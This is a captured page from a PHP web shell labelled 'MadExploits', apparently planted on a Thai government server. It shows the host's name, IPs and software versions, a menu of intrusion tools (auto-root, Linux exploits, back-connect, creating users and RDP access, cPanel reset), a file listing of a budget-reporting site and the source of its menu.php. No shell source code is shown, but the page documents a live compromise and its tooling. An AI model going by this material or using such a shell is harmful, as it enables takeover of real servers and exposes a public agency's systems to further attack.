Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
rss /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
e-budget
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
index.php
15.62
KB
-rw-r--r--
menu.php
1.46
KB
-rw-r--r--
report_e-asset_detail.php
9.63
KB
-rw-r--r--
report_e-budget_Expense.php
17.02
KB
-rw-r--r--
report_e-budget_group.php
15.64
KB
-rw-r--r--
report_e-budget_stregic.php
15.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menu.php
<link rel="stylesheet" type="text/css" href="css/ddsmoothmenu/ddsmoothmenu.css" /> <style type="text/css"> html .ddsmoothmenu{height: 1%;} /*Holly Hack for IE7 and below*/ </style> <script type="text/javascript" src="css/ddsmoothmenu/jquery.min.js"></script> <script type="text/javascript" src="css/ddsmoothmenu/ddsmoothmenu.js"> /*********************************************** * Smooth Navigational Menu- (c) Dynamic Drive DHTML code library (www.dynamicdrive.com) * This notice MUST stay intact for legal use * Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code ***********************************************/ </script> <?php $day = date("Y-m-d"); //เริ่มต้น เมนู echo "<div class=topbar>"; //<!-- Smooth Menu. --> echo "<div id=\"smoothmenu1\" class=\"ddsmoothmenu\">"; echo "<ul>"; echo " <li><a href=\"".$url."\">เมนู - รายงานบริหารงบประมาณ</a>"; echo " <ul>"; echo " <li><a href=\"report_e-budget_stregic.php\">จำแนกตาม - งบประมาณตามภาระงาน สพท.</a></li>"; echo " <li><a href=\"report_e-budget_group.php\">จำแนกตาม - กลุ่มงานใน สพท.</a></li>"; echo " <li><a href=\"".$url."\">เจ้าหน้าที่เข้าระบบ AMSS++</a></li>"; echo " </ul>"; echo " </li>"; echo "</ul>"; //<!-- Smooth Menu. --> echo "<br style=\"clear: left\" />"; echo "</div>"; echo "</div>";
Close